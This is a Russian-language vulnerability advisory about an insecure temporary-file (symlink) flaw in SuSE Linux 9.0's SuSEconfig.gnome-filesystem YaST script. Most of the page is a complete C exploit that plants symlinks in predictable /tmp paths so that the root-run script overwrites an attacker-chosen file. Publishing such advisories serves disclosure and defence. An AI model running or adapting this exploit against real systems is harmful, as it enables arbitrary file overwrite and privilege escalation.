| Дата публикации: | 16.01.2004 |
| Всего просмотров: | 1145 |
| Опасность: | Низкая |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Локальная |
| Воздействие: | Повышение привилегий |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | SuSE Linux 9.0 |
| Уязвимые версии: SuSEconfig.gnome-filesystem
Описание: Уязвимость обнаружена в конфигурационном сценарии SuSEconfig.gnome-filesystem YaST. Локальный пользователь может перезаписать произвольные файлы на системе. Конфигурационный сценарий небезопасно создает временные файлы. В результате локальный пользователь может выполнить нападение символьных ссылок (типа '/tmp/tmp.SuSEconfig.gnome-filesystem.[RANDOM]')., чтобы перезаписать произвольные файлы на системе с root привилегиями. Пример/Эксплоит:
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."
#define START 1
#define END 33000
int main(int argc, char **argv)
{
int i;
char buf[150];
printf("\tSuSE 9.0 YaST script
SuSEconfig.gnome-filesystem exploit\n");
printf("\t-------------------------------------------------------------
\n");
printf("\tdiscovered and written by l0om
<l0om@excluded.org>\n");
printf("\t WWW.EXCLUDED.ORG\n\n");
if(argc != 2) {
printf("usage: %s <destination-file>\n",argv[0]);
exit(0xff);
}
printf("### hit enter to create or overwrite file %
s: ",argv[1]); fflush(stdout);
read(1, buf, 1); fflush(stdin);
umask(0000);
printf("working\n\n");
for(i = START; i < END; i++) {
snprintf(buf, sizeof(buf),"%s%d",PATH,i);
if(mkdir(buf,00777) == -1) {
fprintf(stderr, "cannot creat directory [Nr.%d]
\n",i);
exit(0xff);
}
if(!(i%1000))printf(".");
strcat(buf, "/found");
if(symlink(argv[1], buf) == -1) {
fprintf(stderr, "cannot creat symlink from %s to %s
[Nr.%d]\n",buf,argv[1],i);
exit(0xff);
}
}
printf("\ndone!\n");
printf("next time the SuSE.gnome-filesystem script
gets executed\n");
printf("we will create or overwrite file %s
\n",argv[1]);
return(0x00);
} /* i cant wait for the new gobbles comic!! */
URL производителя:www.suse.com Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | SuSE linux 9.0 YaST config Skribt [exploit] |